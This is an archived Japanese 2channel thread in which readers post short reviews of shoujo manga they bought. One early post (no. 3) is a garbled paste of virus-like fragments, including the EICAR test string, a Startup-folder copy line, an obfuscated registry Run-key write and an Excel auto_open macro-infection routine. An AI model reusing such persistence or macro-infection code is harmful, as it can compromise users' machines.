5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

今日買った漫画+寸評 【3冊目】(゚∀゚)9m

1 :花と名無しさん:2007/07/07(土) 14:26:02 ID:???0
引き続きマターリsage進行で。
前スレ:今日買った漫画+寸評 【2冊目】v(゜∀゜)
http://anime2.2ch.net/test/read.cgi/gcomic/1068475571/

過去スレ:
http://comic.2ch.net/test/read.cgi/gcomic/1003646297/

2 :花と名無しさん:2007/07/07(土) 14:48:44 ID:???0
おっつー

3 :花と名無しさん:2007/07/07(土) 14:50:57 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


4 :花と名無しさん:2007/07/07(土) 15:30:48 ID:???O
スレ立て、乙ー
ンで、スレタイはなぜプギャーな指差しに変わったの?

5 :花と名無しさん:2007/07/07(土) 18:28:42 ID:???0
紀文です

6 :花と名無しさん:2007/07/08(日) 00:37:07 ID:???0
>>5
ちょwwwとりあえず乙www

7 :花と名無しさん:2007/07/09(月) 01:54:05 ID:???0
保守ついでに質問。
このスレって結局少女漫画以外の感想もおk?
前スレでもうやむやになってよく解らんかったのだが(´・ω・`)

8 :花と名無しさん:2007/07/09(月) 04:28:39 ID:???O
少女漫画板にあるスレ=少女漫画限定だと思っていた。
板違いのレス、そんなに多かったっけ?

9 :花と名無しさん:2007/07/09(月) 22:24:34 ID:???0
少女漫画以外は該当板…が普通だと思うんだが。
少女漫画以外のは該当板の類似のスレに書き込めばいいだろう。
なんの為の少女漫画板なんだ。


10 :花と名無しさん:2007/07/09(月) 22:30:22 ID:???0
マロンのスレも普通に少女漫画の報告レスあるしね。
まあ長々とした感想はレスしにくい雰囲気だけど

11 :花と名無しさん:2007/07/10(火) 03:23:03 ID:???0
河惣益巳『玄椿』8巻

何となく習慣で買ってしまい、禿しく後悔…。
元々の主人公(胡蝶)よりは、ゲストキャラの女の子(十子)が
可愛いかったけれど、どうして、いつも何処かが普通よりも
秀でた特別な設定なんだろう。

たまには、特別じゃない、ホントに普通で一所懸命なだけの
純粋なキャラクターが見てみたい。

早く本編も連載開始時の目的を達成すべく
さっさと妊娠→出産して完結してほしいもんだなぁ…。
最初から上手ではない絵柄の劣化も酷くて、後頭部は
どこへ?状態なのも哀しいよ・゚・(ノД`)・゚・。

12 :花と名無しさん:2007/07/17(火) 20:58:26 ID:???0
HIGH SCORE 6巻 津山ちなみ

まだ出てたんだ…と感心しながら購入。やっぱ好きだコレ。
いい加減ネタ被ってるだろ的な話もいくつかあったけど
面白いからよし。初めの人物相関図にワロタ。
てか泉ちゃんと香織のかけあいが可愛すぎるww
もうくっついちゃえよおまえらwwwまあ絶対無いだろうけど。
満足。
けどもう表紙はダマ先生シリーズじゃなくなるみたいなのが残念。



放課後保健室 8巻 水城せとな

やっと話進展した感じ。にしてもどんどん主人公が女になってくな…ドロッドロ。
主人公がうざいくらい無神経なのをきちんと周りが指摘してるってのがウリなんだろうな、この漫画。
逆に紅葉が成長して健気…「授業」の時の変わり方は嬉しかった。…幸せになってほしい。


13 :花と名無しさん:2007/07/22(日) 01:03:01 ID:???0
「蒼のマハラジャ」 ホーム社文庫版3&4巻 神坂智子

波乱の展開を何度も繰り返しながら、主役カプーの愛が深まり
信頼し合う姿に、切なさや涙なくしては読めない。
第二次世界大戦を経験していない世代にも
当時どれほど深刻な状況だったのかを感じさせる描写も凄い。
そんな中、時折コメディな息抜き場面もあって、本当にバランスのいい
良作を産み出した神坂さんの力量に感心する。

来月発売予定の5巻で完結だけれど、現時点で既に
完結するのが寂しいとも思ってしまう。
もし作者本人にその気があれば、後日編や外伝なども
読んでみたいと思うほど感動したし、面白かった!!ヽ(´∀`)丿

14 :花と名無しさん:2007/07/28(土) 05:26:26 ID:???0
保守

15 :花と名無しさん:2007/07/29(日) 22:41:13 ID:???0
>>13
復刊まで長かったけど、王道で楽しいね
他の作品の復刊を祈る

16 :花と名無しさん:2007/08/09(木) 15:08:27 ID:???0
トラブルドッグ1〜10巻 六本木綾
なんとなく暇潰しに買ったんだけど、久々に良作に出会えた。
とにかくリュウがカッコ良くて色気が凄い、しーなとの付かず離れずな関係も良かった。
あーイイ漫画に出合えた。

ハートを打ちのめせ!1、2巻 ジョージ朝倉
中学生ならではの甘ずっぱさのオンパレードだった
面白かった。

17 :花と名無しさん:2007/08/16(木) 02:34:24 ID:???0
「プルミエミュゲ」下巻 原作/水木杏子 絵/英洋子

長年手に入らない最終巻を探していた作品なので、今日文庫で見つけた時は小躍りした。
コミックス3巻まで持っていて、最終話の載ったひとみは捨てられない状態だった。
何度も読み返したが、久しぶりに読み返して嬉しかった。やっぱりこの話好きだ。
しかし、雑誌と比べて何個所か加筆訂正されている部分がある。
これはコミックスになった時に訂正されたのかも、3巻も訂正されていたし。
個人的には最終話の部分は雑誌のままの方がよかった。表情とかセリフとか。

「机上のrubber」 ヒタチなお

表紙とあらすじで買ったが、個人的に好み。こういう話好きだ。

18 :花と名無しさん:2007/08/19(日) 11:13:47 ID:???0
ほるぷ平和漫画シリーズ収録の、巴里夫「石の戦場」
このシリーズ、今は結構レアらしいけど、たまたまボランティア先にそろってて読めた。
作者の体験が元になってるそうだけど、確かにリアリティーがあって面白い。
「はだしのゲン」みたいにテレビドラマ化してほしい。

19 :花と名無しさん:2007/08/21(火) 03:46:32 ID:???0
薔薇のために 吉村明美 文庫全9巻
途中までチラっと立ち読みしてこれはもう葵で決まりだろう
と全買いしたら… まあゆり幸せならよかったよ

銀河 アルコ 
こつこつみつけるたびに買い揃えてやっと最後の見つかった
基本外れなしの作家だと思ってるのでこれから読むの楽しみ

回転銀河 4巻
これもやっと見つけた やっぱいいね

百年の恋も覚めてしまう くらもちふさこ 文庫
読む前に寝そう

燃えよペン 島本和彦
炎尾燃最高


20 :花と名無しさん:2007/09/01(土) 00:10:40 ID:???0
ラビット・ハンティング2

鳥がカバを生んで戸惑うけど、どこの親子もそんなもんに慰められた。
愛情はあって、でもそれがかえって始末が悪いって、切ないなあ。

今後つきあうってことになったチャイナとクロムのその後が楽しみ。

21 :花と名無しさん:2007/09/08(土) 00:51:41 ID:pxKlhh940
働きマン4巻
あの高宮って人とは恋愛関係になるのか?


下がってるのでage

22 :花と名無しさん:2007/09/10(月) 17:48:31 ID:???0
オトメン1巻
絵は綺麗なんだけどな〜。
話は正直惜しい。続きは多分買わない。


23 :花と名無しさん:2007/09/11(火) 19:05:08 ID:fTg6+tedO
昨日はDMCの2巻と3巻、お伽話をあなたに中東編、ハイスコア6巻を買った。
今日は今から予約してたときめきトゥナイト(文庫版)5〜15巻を取りにいくぜ!

24 :花と名無しさん:2007/09/13(木) 09:07:05 ID:???0
悪魔とドルチェ
絵は綺麗だけど、話はいまいちかも…
からくりオデットの方が面白かったな

ラビット・ハンティング2
結構面白い
個人的にちょっとダレ気味なカルバニアより好きかも

カルバニア11巻
女領主絡みはよかった

文庫版FREE1、2
描き下ろし表紙の絵…無茶苦茶劣化したなあ。単行本の使いまわしでよかったのに…
中身は、久々に読んでも面白かった

25 :花と名無しさん:2007/09/14(金) 01:03:21 ID:???O
わかってないのはわたしだけ

鳥飼茜

表紙で買った。繊細系の話だと勘違いした自分がわるいんだろうけど
この作家の人はかわかみじゅんこか雁須磨子かそのへんのアシやってたりしたんかな?
そうでもなければこのモノローグコマ割り台詞のテンポ表情の似すぎっぷり
納得できないんですがまじで

26 :花と名無しさん:2007/09/14(金) 15:55:33 ID:???0
最近は馴染みのない作家さんのバクチ買いをよくしてるな

電脳ビリーバーズ第02巻 海月志穂子
前巻からの惰性で買った。話の方向性が定まらずそんなに面白くない。

スイッチガール第01巻 あいだ夏波
期待してなかったけど凄く面白かった。
次に本屋さんに寄った時は第02巻を忘れずに買わないと。

本屋の森のあかり第01巻 磯谷友紀
まだまだ絵は下手糞だけどそこそこ面白かった。
第02話でBLコミックを扱うのははやすぎると思うけど。
なんて漫画家か忘れたけど帯のイラストが気持ち悪かったのですぐに捨てた。


27 :花と名無しさん:2007/09/14(金) 22:00:56 ID:???0
大量買いしてみた

グランローヴァ物語文庫1〜2巻
あとがき漫画にびっくり。編集さん凄いなー

パティスリーMON1〜4巻
割と面白かったけど、恋愛よりもうちょっとお菓子方面に向いた話のが好きかも

たまちゃんハウス1〜2巻
落語は全く興味ないけど割と面白かった。

ご主人様と甘い林檎のお菓子2巻
2巻も面白かった!

デーモン聖典11巻
ご都合主義的な感じもするけど、まぁまぁな終わり方だった

28 :花と名無しさん:2007/09/16(日) 14:16:50 ID:???0
メッシュ 全3巻
高校の時友人に借りた時は今一だったけど
偶々見つけて懐かしくなり衝動買いした 今見るとかなり面白く感じる

ポーの一族 全3巻
有名過ぎて読まず嫌いだったけどあったので勢いで買ってみたら
落ちた エドガー美しすぎ これから萩尾作品買い漁ろうと思う
ただ文庫の掲載順が謎

ラヴァーズ・キス 全2巻
それなりに良かった

桜蘭高校ホスト部 11巻
惰性で買った

ホーリーランド 15巻
路上のカリスマかっこいい

29 :花と名無しさん:2007/09/18(火) 19:11:42 ID:???0
暁のアリア
なんか笑えるwけど面白い

30 :花と名無しさん:2007/09/22(土) 13:57:21 ID:???O
潔癖少年完全装備 2巻

ラブ米が豊作じゃ──!!!!
前の巻と、ちょっと方向性が変わったかな
絵が何より安定してきている感じ

31 :花と名無しさん:2007/10/03(水) 01:44:48 ID:???0
・鈴木ジュリエッタ「カラクリオデット」1〜4巻
2巻の表紙が可愛かったので表紙買い。
アンドロイドもの好きじゃないけど、意外と話がしっかりしてて面白かった。
結構いい話が多い。友情メインの話の方が好きかも。
どのキャラもみんな好きだけど、博士が特に好きだ。次巻も楽しみ。

・TONO「カルバニア物語」11巻
やっと買ったー。エキューもタニアもよかったねー。
絵は相変わらず適当だけど、やっぱ話が好き。エキューパパかっこいい。

・遠藤淑子「心の家路」
以前はストーリーの中にグッと来る台詞がさり気なく織り込まれてて
それが好きだったけど、この頃の作品は、決め台詞のために
ストーリーを作ってる感じがして微妙かも。素直に心を打たれない。
台詞は相変わらず好きだけど…
特に「チェスナット」のハーマンさんが気に入った。

32 :花と名無しさん:2007/10/27(土) 00:49:11 ID:???0
地味スレだが、>27のおかげでご主人様〜の二巻が出ていることを知った
ありがとう寸評スレ

ラウンダバウト/渡辺ペコ
じんわりといい。中学生の頃を思い出す。

33 :花と名無しさん:2007/10/30(火) 12:36:31 ID:???0
>>26
>本屋の森のあかり第01巻 磯谷友紀
>第02話でBLコミックを扱うのははやすぎると思うけど。
なるほど
さっきそこ読んでモヤモヤしてた
ほんわかした話だと思って買った俺が悪いんだがw
共感できない部分が多いのと
意味のない三河弁で理屈をごり押ししてるのが個人的にはNGだった



「道草教室」1,2巻
フリースクールの話 面白かった
ただ1巻と2巻で漫画の見せ方が変わった気がした
1巻はフリースクールの「登場人物」の話だったのに
2巻は「フリースクール」の登場人物の話になってた
あとがきでなんか書いてあったからそこらへんかな


「たらんたランタ」全2巻
なんだかよくわからない漫画
シリアスな部分がないほうがいい?かも
面白いとは思う

34 :花と名無しさん:2007/11/05(月) 00:44:48 ID:???0
箕野希望「キミがダイスキなんだ」
面白かった。絵も話も好み。まだ若い人みたいで買うの躊躇してたけどよかった。

桃森ミヨシ「悪魔とラブソング」2
1買ってないのに表紙買いしてしまった。んー、いじめの話は苦手。
閉じられた社会が病的で思考が狭く重くなる。

石井まゆみ「ボンクレーショーガッツ」1
現役の学校の教室がテナントスペースになってるという発想が面白かった。現実的で。
OLしながら今の学校も見れるってのがちょっといいかも。卒業したらあの中、ブラックボックスだし。

南塔子「偶然か 運命か」
ちょっと前に買ったやつだけど。絵か好み。話も最初読んだ時はふーんて感じだったけど、
重ねて読むと段々好きになってきた。

35 :花と名無しさん:2007/11/05(月) 07:06:52 ID:???0
1〜2ヶ月分のまとめレス。

「天空聖龍〜イノセント・ドラゴン〜」4巻 山口美由紀
王道展開な少女漫画に山口の真髄が溢れていてwktk。
絵柄の崩れが見受けられないベテランで、安心して続きが待てる!
あまりにも面白いので連載でも読んでいるけど、コミクス化の際に
つなぎに加筆もあるし、柱の作者一言もほのぼので◎。

「傀儡師リン」4巻 和田慎二
ヒロイン・リンが往年の名作スケ刑事・サキ化しているのがちょっとな…
気になる…△。本編は和田さん得意の復讐物だけど
これからも登場するっぽい人形キャラでどんなのが登場するのか楽しみ。
あと敵役と思われていた雅とリンとの微妙な距離感が今後どう変化するか?wktk。

「放課後保健室」9巻 水城せとな
本当に佳境に入ってきたなぁ…あと1巻で完結との予告があるけど
こんな風に計画的にストーリーが練られているのは嬉しい。
自分自身は先読みできる技量がないので、良い意味でいつも驚かされる
展開が続く。早売りバレで最終回バレ読んだのだが、姫かコミックス購入で
ラストを読むのがとても楽しみな作品。

36 :花と名無しさん:2007/11/05(月) 07:07:38 ID:???0
あ、失敗。↑先月のだけだったw

37 :花と名無しさん:2007/11/10(土) 15:48:46 ID:???0
ぼくの地球を守って 全21巻
漫画読みとして避けては通れないと腹をくくり揃えた
全部読み終わったけど特に感想もなく惰性で読んだ
続編が出てるそうだけど気にならないから読まないと思う
正直いろんなとこで絶賛されていた分期待外れだったかな



38 :花と名無しさん:2007/11/19(月) 21:17:03 ID:???O
アクマくんシリーズ「魔法★BITTER」文庫版1-2巻
内容は連載当時既読だったが、忘れていたので普通に楽しんだ。
チャチャもアシャもThe女の子って感じで可愛い…多少若さによるイタタな部分が
あっても許容範囲。個人的にはチャチャの育ての母キャラの言動どうよ?な感じ…
イイ年して感情でしか物事が考えられないのか?と。
しかし少女漫画としては佳作だなぁ。

描き下ろしたカバーイラスト…最悪('A`)
作者本人自覚あるのなら、編集に自ら固辞しろや!な出来。
連載時の絵が好きな人には拷問です…。

39 :花と名無しさん:2007/11/19(月) 21:26:42 ID:???O
「天の果て地の限り」文庫版 大和和紀

大和さんと言うだけで買ってみたw 里中さんの「天上の虹」も読んでいるんだが、
同じ額田女王を扱っていても、全く違う側面の作品。
モノローグが多い心情描写に重きを置かれた感じなので。
率直に言うと個人的には微妙…悪くはないのだが、何度も読み返そうとは思わない感じ。
同時収録のコメディータッチな苺〜の方がはいからさん系のテイストで好きかも。

40 :花と名無しさん:2007/11/23(金) 22:10:16 ID:???O
「花の名前」四巻
全四巻はちょっと長すぎたな。
でもこの人の描く柔らかそうな女の子が好きなのでつい買っちゃう。

41 :花と名無しさん:2007/11/27(火) 23:35:16 ID:???0
舞姫七変化

昔古本屋で集めてたけど処分したので文庫化を機に購入してみた。
出雲の阿国の生まれ変わりとか前世の恋人とか厨くさいがメロドラマっぽくて面白い。
しかし今にして思うと当て馬の織田信長と蘭丸の関係ホモくさすぎ・・・


42 :花と名無しさん:2007/11/29(木) 23:03:14 ID:iAyWH7UhO
波津彬子
「パーフェクト・ジェントルマン」「お目にかかれて」
今まで雑誌で短編立ち読みしかしたことなかったけど、こうしてまとめて一冊になった話を読んで、さすがベテラン!と思った。
なんだろう、古き良き時代の映画を見た気分。
ヒッチコックの映画、また見たくなっちゃった。

43 :花と名無しさん:2007/11/30(金) 01:01:50 ID:???0
最近読んだもの。

「悪魔とドルチェ」2巻
1巻読んだときは微妙かなーと思ってたけど、2巻は面白かった。
高飛車系のキャラ好きじゃないのに、ビュートかわいいよビュート

「時をかけた少女たち 平安〜鎌倉編」
良くも悪くも、古い、正統な少女マンガって感じかな。絵も話も。
歴史物だから容赦なく斬首されてたりするけど。

借り物だけど…
「紅茶王子」全25巻+「紅茶王子の姫君」
こんな内容のないご都合主義の漫画がよく25巻も続いたなぁ。
放り投げたままのキャラや伏線が多すぎないか?
アールグレイの残りの願いごとどうなったんだ。

でも、紅牡丹の3つ目の願いごとエピソードは好きだった。

44 :花と名無しさん:2007/11/30(金) 23:55:48 ID:???0
山田南平スレ!250〜波平式算数講座〜
http://ex20.2ch.net/test/read.cgi/nanmin/1194953160/942

942 名前: コピペ [sage] 投稿日: 2007/11/30(金) 14:53:09 
今日買った漫画+寸評 【3冊目】(゚∀゚)9m 
http://anime2.2ch.net/test/read.cgi/gcomic/1183785962/l50 

43 名前:花と名無しさん メェル:sage 投稿日:2007/11/30(金) 01:01:50 ID:???0 
最近読んだもの。 

「悪魔とドルチェ」2巻 
1巻読んだときは微妙かなーと思ってたけど、2巻は面白かった。 
高飛車系のキャラ好きじゃないのに、ビュートかわいいよビュート 

「時をかけた少女たち 平安〜鎌倉編」 
良くも悪くも、古い、正統な少女マンガって感じかな。絵も話も。 
歴史物だから容赦なく斬首されてたりするけど。 

借り物だけど… 
「紅茶王子」全25巻+「紅茶王子の姫君」 
こんな内容のないご都合主義の漫画がよく25巻も続いたなぁ。 
放り投げたままのキャラや伏線が多すぎないか? 
アールグレイの残りの願いごとどうなったんだ。 

でも、紅牡丹の3つ目の願いごとエピソードは好きだった。 

45 :花と名無しさん:2007/12/01(土) 04:24:55 ID:???O
ブックオフにて上田美和の「Oh,myダーリン」全巻買ってきた。
他のスレで感動するとかかなり勧められたし、なんとなく面白そうだったから全巻買ってみた。
とりあえず感想は、なんてことない普通の漫画ってことかな。
10年以上前の作品だから当時ではありきたりの話とされてなかったんだろうけど、今現在の自分としては予想通りの展開ばかりで激しく萎える。
こんなに展開が読めてしまうのは末次由紀の漫画以来だった。
先生と生徒の恋愛漫画だから一波乱なきゃ話にならないのはわかるけど、元カノが子供認知しろとか、先生を好きな他の生徒がレイプされたのを逆恨みして主人公いじめたりだとか、先生との関係がマスコミにバレて世間の目にさらされたりだとか…
いちいち大袈裟な展開の割には登場人物の心理描写も結構お粗末だし、あと残り1巻で読み終わるけど…
中学生とかだったら面白いと感じるんだろうなという感じ。
私は個人的に心理描写メインの作品が好きなので、勧めてくれた方には悪いけど、こーいうタイプの漫画は受け付けませんでした。

46 :花と名無しさん:2007/12/02(日) 23:30:47 ID:???O
今日買った漫画
【少年進化論5巻】
くさなぎ俊祈著

絵柄が…

全編アシに描かせたのかと思うほど『主人公』の顔が変わっていて驚いた

47 :花と名無しさん:2007/12/03(月) 00:58:47 ID:???0
「boysエステ」全巻
絵に魅かれて買った。男はかっこいいけど、もうちょっと恋愛面掘り下げてほしかった。
物足りない終わり方。
「ひまわり 健一レジェンド」1〜4巻
個人的にきせかえユカちゃんの方が好き。
でも東村アキコはやっぱり気が合いそうなので応援。

真崎総子って今連載してないのかな。
けっこう男がかっこいいんで次回作に期待。

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)